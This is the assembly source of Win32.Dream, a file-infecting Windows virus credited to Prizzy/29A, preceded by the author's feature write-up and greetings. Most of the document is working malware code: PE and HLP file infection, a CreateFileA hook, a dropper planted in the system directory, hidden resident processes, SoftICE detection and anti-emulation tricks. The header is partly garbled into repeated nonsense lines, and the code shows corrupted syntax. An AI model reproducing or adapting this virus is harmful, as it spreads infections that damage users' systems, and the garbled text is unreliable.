;
Where is 谀 谀 屯 屯 哪 哪 哪 哪 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯;;;;;;;; 29A:
Where is the 睦 耐 屯 睦 睦 哪 哪 哪 哪 馁 馁 馁 屯 屯 屯 屯 屯 馁 馁 睦 睦 睦 睦 睦 睦 馁
Hello People, Here Is My Third Virus Especially When IT ITSDESIGNED FOR
WHOLE WIN32 Platform. IT INFECTS ONLY EXE (PE - Portable Executable)
Files and Also HLP (Windows Help File Format).
;
When Infected Exe File Is Started, Eip Goes Through My Easy Polymorphic
; Engine, Which Isn't SO Important in this Virus, The Hooks CreateFilea
Function, Installs Itself Into Memory and Only Then IT Can Put Eip To
The Host - There're Two Returns, ONE for EXE The Other for HLP Files.
;
WITH MIGH AND MIND I WANTED TO Use ONLY IT The Best from New High-Tech
; Vx Methods We know. And i think is nothing worst tran virus equipped of
InterProcess Communication (IPC). I Also Changed My Coding Style and
This Source is Most Optimization As I Could.
;
;
Detailed Information
Where is Xiyomo know? Where is it?
;
;
1. InterProcess Communication (IPC)
Where is Xiyomo know and know and know? Where is you ?; You Could See One IPC Virus (Vulcano) by Benny / 29A But I Used this Fea-
Ture Other Way Than He. His IPC Virus Is Only in One Process and It Can
Communicate with Others Viruses in Another Process.
;
; The parts of my win32.dream Virus Work in Several Processes and in Fact
IT Behades Like One Whole Virus. After Installing to Memory, Virus Will
Remove Itself from Memory of the Infected Program.
;
;
; 1.1. CREATING Processes
Where is Xiyomo know? What is it ?; this virus is divided Into seven 'Independent' Functions Which Have Own
Process. To create new process I would build a dropper and via the cre-
Ateprocessa I Would Run Them.
;
The Dropper Wait Than New Function for ITS Process Is Ready, IF Yes, IT
Shares two mapped blocks (OpenFilemappinga) for That Process (It's Glo-; Bal Memory and Function's Body) and Creates Thread on the function. The
Process can't Terminate It can Only Sleep. All created Processed Are
Hiden in Windows 95, Not in Winnt / 2K (is't more complex).
;
;
; 1.2. IPC in Action
Where is Xiyomo?
Hooked Createfilea Functions Retrieves Control, Sets Flag for Certain
Process and awakes its. That Process Finishes Own Task and Returns Re-
SULTS.
;
;
; 1.3. Global Memory
Where is Xiyomo?
IT 'S Necessary to Share Some Important Information Among All Processes.
There Are:
;
; [THANDLE]: WHEN The Dropper Will Create New Thread Here Is Re-
Turned Handle. It IT INDICES The Thread's ErrorCode.
; [TH_MEMPOS]: Here Is Stored The Name of the Function's Mapped
Object. The Dropper Will Open That Memory Area.
; [Process]: HProcess, Processid Values of The All created Pro-
Cesses Because of opening / Runing Them.
; [apiz]: the addresses of the all apiz i call are on this
Place.
; [ACTIVE]: if Other Process Wants to Run ME, Sets Certain Flag
Here and the thread tests it.
; [paramz]: this is place where the Virus Store Some Parameters
Among Processes (see Below).
; [vbody]: here is the copy of the Virus, useful for changing
VALUES INSIDE AND for POLY ENGINE.
; [filename]: The Future Infected FileName. New CreateFilea Func-
Tion Stores the name here.
; [CINFECTED]: Two FPU Memory Buffers, One for Creating of the in-
Fection Mark The Other for checking.
; [poly_vbody]: Output from PolymorPhic Engine.
;
;
; 1.4. Parameters
Which is nine?; As i wrote Above i Have to get some parameters of the input processes .; here is the description of them:
;
; [1st Param]: Out of Polymorhpic Engine, The New Size of The Virus
[2nd param]: FileSize for checksum ( poly size yet).
; [3rd param]: The name of the mapping file (for OpenFileMappinga).
; [4th param]: a. FileSize for check_infected (WITHOUT POLY SIZE).
; b. Out of checksum.
; [5th Param]: Input for check_infected, if '1', Then IT Wants To
Get an Angle for Create_infected.
; [6th param]: Terminate All Processes? (WinNT / 2000 Only)
; [7th Param]: Terminate All Processes? (Win95 / 98 Only)
(BECAUSE OF WIN95 / 98 KERNEL BUG)
;
;
; 1.5. Termination of the all processes
What is Xomomo knows? Where is Xiyo?; I Remember IT WAS A Nut for me But of Course I'd to Solve It. AT First
I Changed Flags of The Process (SetErrorMode, IT Means, The Process' LL
NOT SHOW ANY Message Box if it will do bad instructions, Then i had to
Check if the host limited yet. in Win95 / 98 i Have Discovered a kenl bug
; SO That I COULDN'T Use Winnt Version (openprocess) To check if the host
STILL EXISTS BECAUSE WIN95 / 98 DON 'TELETE ITS Process Id Handle.
Win95 - you can only Read some value the from allocated memory by host.
Winnt - That Allocated Memory is Opened by Other Process, You Can't
Identifyiff.
;
;
; 1.6. The Scheme of the All Processes
Where is Xiyomo know? Where is Xiyomokin?
;
;
Where is the reward? Where is Xombe? Where is Xomiyo?
;? New createfilea API function? What is Toliy?
;?;! Which is it? What is it? Infect file? How is it to be a lot?
What is toughness? What is the infect hlp? What is you? What is it? What is it?
;?;? What is it?
;?? 谀? [Check_infected];?? Yes?
What is INFECT? Where is [poly_engine]
Where is it??; ?? EXE? Where is the [create_infected]
What is it? Which? Which is
;?? Abuse? [Checksum]
What is tou?
;
;
; 2. Optimalization and Comments
Where is Xiyomo know 1?
; Sometimes I Heard My Last Virus Win32.crypto is Too Hue And Also Some
People Had A Fun from Me (Benny, Mort - Gotcha Bastards!) That My Next
Virus Will Be Bigger Than One Megabyte. I Wanted to Optimize Next One
And i've not told the it so I think it'll be surprise for them i pro-
Nevertheless I've A Taste of The Second Side and now I can return
; Myself without any mass problems. But now i can say the virus is more
Optimization Than Benny's Bits and Pieces. The Source Code Is Not COM-
MENTED ENOUGH BECAUSE I Think No Many People Will Taste Something Like
IPC is. If Yes, They Can Contact Me.
;
;
; 3. CHECK Infected Routine
What is Xiyomo knows? Where is it? "Long ago in win32.crypto i tasted to use unique Math Technique How To
Check if the file is infected. Now I Thought Up New More Complex Way.
; At First from Infected File I'll Compile The Equation, for Example:
; y = 32 * x ^ 7 192 * x ^ 3 - 8212 * x ^ 5 - 72 * x
And I'll Get Two Points On That Curve, for Example X1 = 4 and x2 = 7. THEN
I Will Calculate What Angle Is Between The Tangents to the Curve from
That Two Points, IT Means: I Have to Calculate DeriVation Y 'of That
Equation and if i know y = x1 and y = x2 Then i will determine:
; & = Arc TG | LOG (X1 - X2) - LOG (1 x1 * x2) |
If The Angle Will Be Greater E.g. Than 75 Degree, File Is Infected.
;
; This Algorithm Has Been Coded Only for Fun So That I Know We've Easier
Methods But I Couldn't Call To Remembrance on Any .;
;
; 4. Pearls Behind The Scene
Where is Xiyomo know? Where is it?
; * ONLY TWO Weeks Before Release I've Think The Virus Name Up at Last.
; * At a time, during code, i stopped Writing and this Virus I Haven't
Coded for Two Months. Later When I Started Again I COULDN '' 'REMEMBER
What That Code Does and so on.
; * In present exissrs over one fifty backup copy.
; * The Worst Part of The Virus Was The Dropper, There WERE MANY CHANGES
BECAUSE OF WIN9X AND WINNT Compatibility; Many Bugs Were There.
; * After a hour of the coding i unwillingly deleted new version. So That
I'd to save more Than One Gigabytes from Fat32 on Another Hard Disk.
Only There I Found That Lost Version.
; * The Best Thing I Like on the whole virus is main commert.
; * Working Directory Was 'E: / X_WIN /' AND THIS FILE NAME WAS 'WIN.AS!'.
; * Last Week I Was Looking for Help on Mirc
;
;
; ... but much help i Haven't Found There (although Bumblebee Helped
ME with another bug.
; * During Whole Coding I've Read Five Books and Three Film Scripts.
;
;
; 5. List of greetings
Where is Xiyomo know?
Darkman the master of the good Optimistic Mood
Bumblebee Thanks for your help during code
Billy Belcebu So, Our Communication Has Started Yet
Griyo All The Time Busy Man
Lord Julus Waiting for your new Virus and Its Meta ENGINE
Mort So Did you think this source will be bigger the
One megabytes? Sorry, Maybe Later :).
J.P. i Look Forward on Future with you, Dude .; Ratter No, No. Stop Reading and let you show us what you show
Are hiding inside.
; Virusbuster Here Is That Secret Bin with Savage Poly Engine As
You wrote on #virus.
Benny It The Best in The end, Benny. Haha, At Last THIS
Source is Optimized and you will stop to worry me.
Thanks for All You Have E'er Done for Me.
; ... and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
; 6. Contact ME
Where is it native?; Prizzy@coderz.net
; http://prizzy.cjb.net
;
;
; (c) Oded by Prizzy / 29A, June 2000
;
;
.486P
.Model flat, stdcall
Locals
INCLUDE INCLUDE / MZ.INC
INCLUDE INCLUDE / PE.INC
EXTRN EXITPROCESS: PROC
EXTRN CREATEFILEA: PROC
EXTRN Messageboxa: Proc
Where is the thumb be a beautiful to program Start? Where is Xomiyo? Where is Xiyomo?
.DATA
DB?
.code
What is the thumb of Virus Code Starts Here? Where is Xomiyo? Where is Xiyomo?
vStart Proc
Pusha
Call $ 5
POP EBP
SUB EBP, $ - vStart-1; Get Delta
vsize equ file_end - vStart
Mov Eax, [ESP VSIZE 32]
Sub Eax, 1000H
INF_EP EQU $ -4
MOV [EBP HA_MODULE-VSTART], EAX
Add Eax, FG0 - VStart 1000H
ORG_EP EQU $ -4; Get Startup Address
Push EAX
CALL GET_K32_APIS
JMP __RETURN
@ANTI_E:
Call kill_st
Call Check_resident; try to create it
Call create_process_maps
.IF BYTE PTR [EBP ERROR-VSTART] == 0
Call hookapi
.endif
__Return:
POP DWORD PTR [ESP 28]
POPA
SUB ESP, -VSIZE-4
DB 90H, 90H
JMP EAX; EXE BACK
XOR EAX, EAX; HLP BACK
Ret 8
vStart ENDP
GET_K32_APIS PROC
PUSH 20
Mov Eax, [ESP VSIZE 48]; Find K32 Address
Sub Ax, AX
POP ECX
@@ 1: .if Word PTR [EAX]! = 'ZM'
Sub eax, 65536
Loop @@ 1
JMP GK32A_F_A
.endif
CMP BYTE PTR [EBP __ RETURN 11-VStart], 90H
JZ $ 5
POP EAX
JMP __RETURNPUSH EAX EAX; Get K32 Tables
Add Eax, [EAX 60]
POP EBX EDI
Add EBX, [EAX 78H]
MOV CL, 0
@@ 3: Push EBX ECX
Mov EDX, [EBX 32]
Add Edx, EDI
@@ 4: MOV ESI, [EDX]; Calculate Next CRC32 FUNC.
Add ESI, EDI
PUSH ECX EDX EBX; CRC32 Algorithm
STC
SBB ECX, ECX
MOV EDX, ECX
@@ 4_crc32_nbyte:
Sub Eax, EAX
SUB EBX, EBX
Lodsb
XOR Al, Cl
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
@@ 4_Crc32_nbit:
SHR BX, 1
RCR AX, 1
JNC @@ 4_Crc32_no
XOR AX, 08320H
XOR bx, 0edb8h
@@ 4_Crc32_no:
DEC DH
JNZ @@ 4_Crc32_nbit
XOR ECX, EAX
XOR EDX, EBX
CMP Byte PTR [ESI-1], 0
JNZ @@ 4_Crc32_nbyte
@@ 4_Crc32_fin:
Not Edx
NOT ECX
POP EBX
MOV EAX, EDX
ROL EAX, 16
MOV AX, CX
POP EDX ECX
CMP [EBP K32_CRCS ECX * 4-VStart], EAX; CRC32 == My FUNC?
JZ @@ 5
SUB EDX, -4
JMP @@ 4
GK32A_F_A:
JMP GK32A_F
@@ 3_a:
JMP @@ 3
@@ 5: Sub EDX, [EBX 32]; Get Addr of the New Func.
Sub EDX, EDI
SHR EDX, 1
Add Edx, [EBX 36]
Add Edx, EDI
Movzx EDX, Word Ptr [EDX]
SHL EDX, 2
Add Edx, [EBX 28]
MOV EDX, [EDX EDI]
Add Edx, EDI
POP ECX EBX
Movzx EAX, Word PTR [EBP ECX * 2 K32_ADDRS-VSTART]
NEG AX
MOV [EBP EAX], EDX; Store ITS
@@ 5a: Inc ECX
Mov Eax, EDI
ROL EAX, 8
SUB Al, 0BFH
JZ @@ 5b
CMP ECX, 14
JZ @@ 5a
@@ 5b: CMP ECX, Count
JNZ @@ 3_a
Push p_number 1; Update Sleep Function
POP ECX
@@ 6: Movzx Eax, Word PTR [EBP Process_Maps ECX * 2-VStart-2]
NEG AX
MOV [EBP EAX 2], EDX
@@ 7: loop @@ 6
Test Al, 0C3H
GK32A_F EQU $ -1
POP EAX
Push CS; Anti-emulator
Lea Eax, [EBP @ Anti_e-VStart]
Push EAX
Retf
GET_K32_APIS ENDP
KILL_ST Proccall @ SNT 10
@ S95: DB '//./sice', 0; Name Drivers
@SNT: DB '//./ntice' ,0
POP EBX
Call Open_FILE; OPEN SOFTICE 95/98 OR
JZ @KS_NT; Softice NT / 2K Driver
Dec EAX
Push EAX
MOV EAX, 0
LPCloseHandle EQU $ -4
Call EAX
JMP @KS_KILL; KILL Process
@KS_NT:
Sub EBX, @ S95- @ SNT; Open the Second Driver
Call Open_File
JZ @KS_DOS
Dec EAX
Call [EBP LPCLOSEHANDLE-VSTART]
@KS_KILL:
Push EAX
MOV EAX, 0
LPEXITPROCESS EQU $ -4
Call EAX
@KS_DOS:
CMP DWORD PTR FS: [32], 0; TD32 ETC.
JNZ @ks_kill
RET
Open_ALWAYS_FILE:
Sub Eax, Eax; Create File Always
Push Eax; USEful for Droppers
MOV CL, 80H
Push ECX 2
JMP $ 8
Open_file:
Sub Eax, EAX; Open File in EBX
Push EAX EDX 3
CDQ
MOV DL, 0C0H
Bswap edx
PUSH EAX EAX EDX EBX
MOV EAX, 0
LpCreateFile EQU $ -4
Call EAX
INC EAX
RET
KILL_ST ENDP
Check_resident Proc
Push EBP 1 0; CREATE MUTEX or GET IF IT
MOV EAX, 0; HAS been create => in MEM
LpCreateMutexa EQU $ -4
Call EAX
XCHG EAX, EBX
MOV EAX, 0
LpGetLastError EQU $ -4
Call EAX
XCHG Eax, ESI
OR ESI, ESI
JZ @CR_F
Push EBX
MOV EAX, 0
LPRELESEMUTEX EQU $ -4
Call EAX
@Cr_f: OR ESI, ESI
POP EAX
JNZ __RETURN
JMP EAX
Check_resident ENDP
CREATE_PROCESS_MAPS PROC
MOV BYTE PTR [EBP ERROR-VSTART], 1
Call Build_Dropper; Create Dropper in Sys Dir
JC CPM_FNODEAL
MOV EAX, 0
LpGetCurrentProcessid Equ $ -4
Call EAX
MOV [EBP IF_PARENT-VSTART], EAX
SUB EBX, EBX
Push 80h
CPM_Shared_Mem EQU $ -4
Push 7
MOV EAX, 0
LPseTerrorMode EQU $ -4
Call EAX
POP ECX
Lea EDI, [ECX VBODY]
Push ECX
MOV ESI, EBP
MOV ECX, VSIZE
REP MOVSB
CPM_NXPROC:
POP EAX
Lea EDI, [EAX 8 EBX * 8]
Push EAX
MOV [EAX], EDI
Call @@ 1
DD 0,0,0,0; hproc, hthr, procid, thrid @@ 1: POP ESI
Lea Eax, [EBP VSIZE]
Push ESI EAX 68
POP ECX
@@ 1a: MOV [EAX], CH
INC EAX
Loop @@ 1A
PUSH ECX ECX 640 1 ECX ECX 80H ECX
CPM_CMDLINE EQU $ -5
Inc ECX
MOV DWORD PTR [EAX-6 * 4], ECX
MOV EAX, 0
LpCreateProcessa EQU $ -4
Call EAX
OR EAX, EAX
JZ CPM_Failed
Lodsd; Get HProcess and Processid
Stosd
Lodsd
Lodsd
Mov Edx, EAX
Stosd
Movzx ESI, Word PTR [EBP Process_maps EBX * 2-VStart]
NEG SI
Add ESI, EBP
Movzx ECX, Word PTR [ESI-2]
Mov Eax, 4096
Call malloc
XCHG Eax, EDI
Rep Movsb; Copy One To MEM
POP ESI
PUSH ESI
Movzx Eax, Byte PTR [EBP M_SIGN-2-VStart]
MOV [ESI 4], EAX; Thread Memory Sign
MOV [ESI], ECX; Active Flag
Push ESI COUNT-2
Lea EDI, [ESI APIZ]
Lea ESI, [EBP K32_ADDRS-VSTART]
POP ECX
@@ 2: Sub Eax, EAX
Lodsw
NEG AX
MOV EAX, [EBP EAX]
Stosd
Loop @@ 2
POP ESI
Push EDX ECX 1F0FFFH
MOV EAX, 0
LpregisterServiceProcess EQU $ -4
OR EAX, EAX
JZ CPM_Winnt
Push 1 edx
Call EAX
CPM_WINNT:
MOV EAX, 0
LpoProProcess Equ $ -4; Create Inside Thread from
Call Eax; The Dropper
XCHG EAX, ECX
JECXZ CPM_FAILD
Mov EDX, 0
LPWAITFORSINGLEOBJECT EQU $ -4
Call Edx, ECX, 40
Lodsd
NOT EAX
XCHG EAX, ECX
JECXZ CPM_FAILD
Inc EBX
CMP BL, P_NUMBER
JNZ CPM_NXPROC
Mov Al, Bh; Remove the Virus from the
MOV ECX, (Mem_end - NewcreateFile); Current File, Live on The
Lea EDI, [EBP NewCreateFile-vStart]; Other Places Inside Win32
Rep Stosb
MOV BYTE PTR [EBP ERROR-VSTART], CL
CPM_Failed:
POP EAX
OR EBX, EBX
JNZ CPM_FNODEAL
Call Mdealloc
CPM_FNODEAL:
MOV EAX, [EBP CPM_CMDLINE-VSTART]
MDEAlloc:
Push Eax; Deallocate Shared Memory
MOV EAX, 0
LPUNMAPVIEWOFFILE EQU $ -4
Call EAX
RET
Error DB 0
CREATE_PROCESS_MAPS ENDPBUILD_DROPPER PROC
Mov Eax, 260; Generate Dropper filename
Call malloc
MOV [EBP CPM_CMDLINE-VSTART], EAX
Mov Edi, EAX
Push 7fh Eax; no more kil of 0x80 Chars
MOV EAX, 0
LpgetsystemDirectory EQU $ -4
Call Eax; Get System Directory
OR EAX, EAX
JZ BD_FAILED
Call BD_FNAME
DB '/ mshrip32.dll' ,0; hmmm, My Dropper Name
BD_FNAME:
POP ESI
Push 14
MOV EBX, EDI
Add Edi, EAX
POP ECX
REP MOVSB
Call Open_ALWAYS_FILE; CREATE ITS
JZ BD_FAILED
Dec EAX
Push EAX
Mov ESI, 1024; Alloc Memory for Dropper
Call malloc
XCHG EAX, EDI; EDI = Output, All IS ZERO
MOV Eax, 60000
Push EDI
Lea ESI, [EBP DROPPER_DATA-VSTART]
Call malloc
XCHG EBX, EAX
MOV [EBP CPM_SHARED_MEM-VSTART], EBX
MOV EAX, 0
Lpgetversion EQU $ -4
Call EAX
XOR ECX, ECX
Bt Eax, 63
ADC EDI, ECX
MOV [EBX PARAMZ (7-1) * 4], EDI
POP EDI
Push EDI
MOV Al, [EBP M_SIGN-2-VStart]
MOV [ESI 224], Al; Noone Knows What Is IT
BD_READ:; Create Exe Pe Dropper
XOR EAX, EAX
Lodsb
CMP Al, -1; End of Data?
JZ BD_DONE
Add Edi, Eax; Next Movement
Lodsb
XCHG EAX, ECX
BD_WRITE:
Lodsb
Stosb; Save Data
LOOP BD_WRITE
JMP BD_READ
E8 EQU 0e8
BD_DONE:
PUSH 0
Call @@ 2
DD?
@@ 2: push 1024
Push DWORD PTR [ESP 12]; DropPers Body
Push DWORD PTR [ESP 20]; File Handle
MOV EAX, 0
Lpwritefile EQU $ -4
Call EAX
Push Eax DWORD PTR [ESP 8]
Call [EBP LPCLOSEHANDLE-VSTART]
POP ECX EAX EAX; WRITE ERROR?
Jecxz bd_failed
Test Al, 0F9h
BD_FAILED EQU $ -1
RET
RADIX 16; Compressed [Dropper EXE (PE) 1024 BYTES]
Dropper_data Equ this Byte
DB 0, 5, 4DH, 5A, 90, 0, 3, 3, 1, 4, 3, 2, 0FF, 0FF, 2, 1, 0B8, 7, 1, 40, 23, 1, 0C0, 83, 2
DB 50, 45, 2, 8, 4C, 1, 1, 0, 7F, 6A, 4, 38, 8, 7, 0E0H, 0, 0FH, 1, 0BH, 1, 6, 6, 1, 2, 6 ,2
DB 0C, 10, 3, 1, 10, 3, 1, 10, 4, 1, 40, 2, 1, 10, 3, 1, 2, 2, 1, 4, 7, 1, 4, 8, 1 20, 3, 1, 2dB 2, 2, 0E6, 3BH, 2, 1, 2, 5, 1, 10, 2, 1, 10, 4, 1, 10, 2, 1, 10, 6, 1, 10,0bh, 2,88,10
DB 2, 1, 28, 54, 1, 10, 2, 1, 8, 1BH, 4, 2EH, 32, 39, 41, 4, 1, 0C8, 4, 1, 10, 3, 1, 2, 3 ,1
DB 2, 0E, 1, 40, 2, 1, 0c0, 20, 2, 0B8H, 10, 0A, 7E, 0E8, 45, 0, 0, 0, 96, 0E8, 0, 0, 0, 0
DB 5DH, 89, 75, 9, 0EBH, 2, 90, 90, 0BbH, 0, 0, 0, 0, 83, 3BH, 0, 75, 1E, 66, 0C7, 45, 6
DB 0EBH, 28, 0E8, 1E, 0, 0, 0, 33, 0C9, 53, 51, 53, 50, 51, 51, 0B8, 0, 0, 0, 0, -1, 0D0
DB 0F7, 0D0, 89, 3, 6A, 0A, 0B8, 0, 0, 0, 0, 0CBH, 0DH, 0EBH, 0CBH, 0ADH, 56, 0EBH, 7
DB 0E8, 2, 0, 0, 41, 0, 33, 0F6, 0BF, 1F, 0, 0F, 0, 6A, 1, 57, 0B8, 0, 0, 0, 0, - 1, 0D0
DB 56, 56, 56, 57, 50, 0B9, 0, 0, 0, -1, 0D1, 0C3, E8, 0, 0, 0, 0, -1, 25, 0, 10, 40, 0
DB 0, 0, 0B0, 10, 0A, 2, 0BeH, 10, 3, 1, 10, 16, 2, 0B8, 10, 6, 0FH, 96, 1, 50, 69, 65, 0
DB 47, 44, 49, 33, 32, 2E, 64, 6C, 6C, 0FF
RADIX 10
Build_Dropper ENDP
Malloc Proc
Pusha; Allocate Shared Memory
XCHG EBX, EAX
SUB ESI, ESI
Inc Byte Ptr [EBP M_SIGN-2-VStart]
Call m_sign
DB "@", 0
m_sign:
PUSH EBX ESI 4 ESI 0-1
MOV EAX, 0
LpCreateFilemappinga EQU $ -4
Call EAX
Dec EAX
JZ M_Failed
INC EAX
PUSH EBX ESI ESI 2 EAX
MOV EAX, 0
LPMAPVIEWOFFILE EQU $ -4
Call EAX
m_failed:
MOV [ESP 28], EAX
POPA
OR EAX, EAX
RET
Malloc ENDP
HOOKAPI PROC
MOV EBX, 0
HA_MODULE EQU $ -4
CMP Word PTR [EBX], 'ZM'
Jnz ha_failed
Movzx ESI, Word PTR [EBX 60]
Add ESI, EBX
CMP Word PTR [ESI], 'EP'
Jnz ha_failed
Mov Eax, [ESI 80H]
Add Eax, EBX
FK32: MOV ESI, EAX
MOV ESI, [ESI 12]
CMP [ESI EBX], 'NREK'
JZ Fkok
SUB EAX, -20
JMP FK32
Fkok: Mov Edx, [EAX 16]
Add Edx, EBX
CMP DWORD PTR [EAX], 0
JZ Ha_failed
Push Edx
MOV ESI, [EAX]
Add ESI, EBX
Mov EDX, ESI
Sub Eax, EAX
FKLP: CMP DWORD PTR [EDX], 0
JZ Ha_failed2
CMP DWORD PTR [EDX 3], 80H
JZ FINC
MOV ESI, [EDX]
Lea ESI, [ESI EBX 2]
Call Fnamdb "Createfilea", 0
FNAM: POP EDI
FCOM: Push 12
POP ECX
REPE CMPSB
Jecxz FAPI
FINC: Inc EAX
SUB EDX, -4
JMP FKLP
FAPI: SHL EAX, 2
Add Eax, [ESP]
XCHG EBX, EAX
MOV EAX, [EBX]
MOV ECX, [EBP CPM_SHARED_MEM-VSTART]
MOV [ECX VBODY NewCreateFile 1-VStart], EAX
Lea Eax, [ECX VBODY NewCreateFile-vStart]
MOV [EBX], EAX
POP ECX
RET
Ha_failed2:
POP EAX
Ha_failed:
POP EAX
JMP __RETURN
HOOKAPI ENDP
DB "Win32.dream, (c) Oded by Prizzy / 29A", 13, 10
DB "The Greetz Go To All 29a Vx Coderz", 13, 10
NewcreateFile Proc
Push 80h
OldcreateFile EQU $ -4
Pusha
Call $ 5
POP EBP
SUB EBP, $ - VSTART-1
MOV EBX, [EBP CPM_SHARED_MEM-VSTART]
Lea EDI, [EBX VBODY VSIZE]
MOV Word PTR [EDI-VSIZE __ RETURN 11-VStart], 9090H
MOV ESI, [ESP 7 * 4 12]
NCFC: LODSB
Stosb
OR Al, Al
JNZ NCFC
Lea EDI, [EBX ACTIVE]
Lea ESI, [EBX Process]; Infect_File HProcess, Procid
Lodsd
XCHG EBX, EAX
Lodsd
MOV BYTE PTR [EDI], 1; Active Thread
Push EAX 0 1F0FFFH
Call [EBP LPOPENPROCESS-VSTART]
XCHG EAX, ECX
Jecxz ncf_failed
NCFW: PUSH 40 EBX
Call [EBP LPWAITFORSINGLEOBJECT-VSTART]
CMP Byte Ptr [EDI], 0
JNZ NCFW
NCF_FAILED:
POPA
RET
NewcreateFile Endp
Start_thread Macro Thread
Pusha; Threads GDELTA
Push 80h; Sleep Function
Call $ 5
POP EBP
Sub EBP, $ - Thread-1
MOV ESI, [ESP 40]
IFE ST_COUNT NE 0
IF_shared_mem EQU $ -4
Push 80H 0 1F0FFFH
IF_Parent EQU $ -11
Call [ESI APIZ 12 * 4]; OpenProcess
XCHG Eax, ESI
XCHG EAX, EBX
OR ESI, ESI
JNZ $ 11; Terminate All Processes
Inc ESI
MOV [EBX PARAMZ (6-1) * 4], ESI
JMP IFEX
PUSH ESI
Call [EBX APIZ 1 * 4]; CloseHandle
MOV ESI, EBX
Else
Push 1
POP EDI
CMP [ESI PARAMZ (6-1) * 4], EDI; Terminate this process? JNZ $ 4
JMP EDI
ENDIF
MOV EAX, [ESI Paramz (7-1) * 4]
Test Al, 1
JZ $ 4
Mov Al, [EAX]
Lea EDI, [ESI ACTIVE ST_COUNT]
Push EDI
CMP Byte Ptr [EDI], 0
JZ @@ End
ENDM
ST_COUNT = 0
END_THREAD MACRO THREAD
ST_COUNT = ST_COUNT 1
Mov Edi, [ESP]
MOV Byte Ptr [EDI], 0
@@ End: POP EDI EAX; Sleep Function
Call Eax, 2
POPA; don't terminate
JMP Thread
ENDM
DW Check_infected-infect_file
Infect_file proc
Start_thread infect_file
Lea ESI, [EBX VBODY VSIZE]
Ifex: lodsb
CMP Al, '.'
JNZ IFEX
Dec ESI
Lodsd
OR EAX, 20202020H
MOV EBX, [ESP 44]
Lea EDI, [EBX Active 4]
Lea ESI, [EBX Process 8 * 4]; Infect_exe HProcess, Procid
CMP EAX, 'EXE.'
JZ IF_2
CMP EAX, 'PLH.'
JNZ if_failed
IF_CALL_HLP:
SUB ESI, 8; Infect_HLP
Dec Edi
IF_2: LODSD
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1; Active Infect_exe (_HLP)
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
XCHG EAX, ECX
JECXZ IF_FAILED - 1
IF_R: POP EAX
Push EAX 40 EAX
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ IF_R
POP EAX
IF_failed:
END_THREAD INFECT_FILE
Infect_file endp
DW create_infected-check_infected
Check_infected proc
Start_thread check_infected
XCHG EBX, ESI
XOR ESI, ESI
CMP [EBX Paramz (5-1) * 4], 1
JZ CI_NOMEM
Other_Process_Mem Macro Shared_Mem, Param; Get Mem from Other Process
Call $ 7
DB "1", 0
PUSH 1 4
Call [Shared_Mem APIZ 24 * 4]; OpenFileMappinga
XOR ECX, ECX
Push EAX ECX ECX ECX 4 EAX
Call [Shared_Mem APIZ 7 * 4]; MapViewoffile
Push EAX
XCHG Eax, ESI
ENDM
Other_Process_Mem EBX, 4
CI_NOMEM:
Add ESI, [EBX PARAMZ (4-1) * 4] MOV ECX, [ESI-4-TBYTE]; Number of the Terms in A
OR ECX, ECX; Equation
JZ CI_FAILED
CMP ECX, 8
JNBE CI_FAILED
SUB ESP, 128
Fsave [ESP]
Push ECX
Imul ECX, - (TBYTE TBYTE)
SUB ECX, TBYTE TBYTE 4 TBYTE
LEA ESI, [ESI ECX]; Data Starts Here
Lea EDI, [EBX VBODY VSIZE 260]
CMP [EBX Paramz (5-1) * 4], 1
JNZ $ 8
Lea EDI, [EBX VBODY VSIZE 260 CI_SIZE / 2]
NEG ECX
Push EDI
REP MOVSB
POP ESI ECX
PUSH ECX ESI
FLD TBYTE PTR [ESI TBYTE]; DeriVation of the Equations
FLD ST (0); You'll Get Two Tangents
FLD TBYTE PTR [ESI]
Fmul
FLD1
Fsubp St (2), ST
FSTP TBYTE PTR [ESI]
FSTP TBYTE PTR [ESI TBYTE]
SUB ESI, - (TBYTE TBYTE)
Loop $ - 21
POP ESI ECX
SUB ESP, TBYTE TBYTE
FLDZ
FLDZ
FSTP TBYTE PTR [ESP]
FSTP TBYTE PTR [ESP TBYTE]
PUSH ESI ECX
Imul Eax, [ESP], TBYTE TBYTE; Involution of The Equations
FLD TBYTE PTR [ESI]
FLD TBYTE PTR [ESI TBYTE]
FLD TBYTE PTR [ESI EAX TBYTE]
FLD TBYTE PTR [ESI EAX]
FLD ST (2)
FLD ST (4)
FXCH ST (2)
Lea EDX, [EBP ($ 32) -Check_infected]
Push Edx
FYL2X; OVER Natural Logarithm
FLD ST (0)
Frndint
FSUBR ST (1), ST
FXCH
FCHS
F2XM1
FLD1
Faddp
Fscale
FSTP ST (1)
Fmul
RET
FLD TBYTE PTR [ESP TBYTE 2 * DWORD]
Faddp
FSTP TBYTE PTR [ESP TBYTE 2 * DWORD]
Call $ - 35; We've Two Points on The Curve
FLD TBYTE PTR [ESP 2 * DWORD]
Faddp
FSTP TBYTE PTR [ESP 2 * DWORD]
SUB ESI, - (TBYTE TBYTE)
DEC DWORD PTR [ESP]; Next Term in the equation
JNZ $ - 85
POP ECX ECX
FLD TBYTE PTR [ESP TBYTE]; Calculate An Angle of To
FLD TBYTE PTR [ESP]; Two Tangents of the equation
FLD ST (1)
FLD ST (1)
FSUB
FXCH ST (2)
Fmul
FLD1
Fadd
FDIVFABS
FLD1
Fpatan
Push 180; Radian -> Angle
FIMUL DWORD PTR [ESP]
FLDPI
fdiv
POP EAX
SUB ESP, - (TBYTE TBYTE)
MOV Eax, 2 * TBYTE DWORD
CMP DWORD PTR [EBX PARAMZ (5-1) * 4], 1
JNZ $ 12
Sub Eax, - (DWORD-CI_SIZE / 2)
FLD ST (0)
FSTP TBYTE PTR [ESI EAX]
FLD TBYTE PTR [ESI EAX]
FSUB
SUB ESP, TBYTE
FSTP TBYTE PTR [ESP]
CMP DWORD PTR [ESP TBYTE-DWORD], 0; Compare The Results
Lahf
SUB ESP, -TBYTE
Wait
Fnrstor [ESP]
SUB ESP, -128
SAHF
JNZ CI_FAILED
Push 1
POP EAX
MOV [EBX Paramz (4-1) * 4], EAX
JMP CI_FINISH
Ci_failed:
XOR EAX, EAX
MOV [EBX Paramz (4-1) * 4], EAX
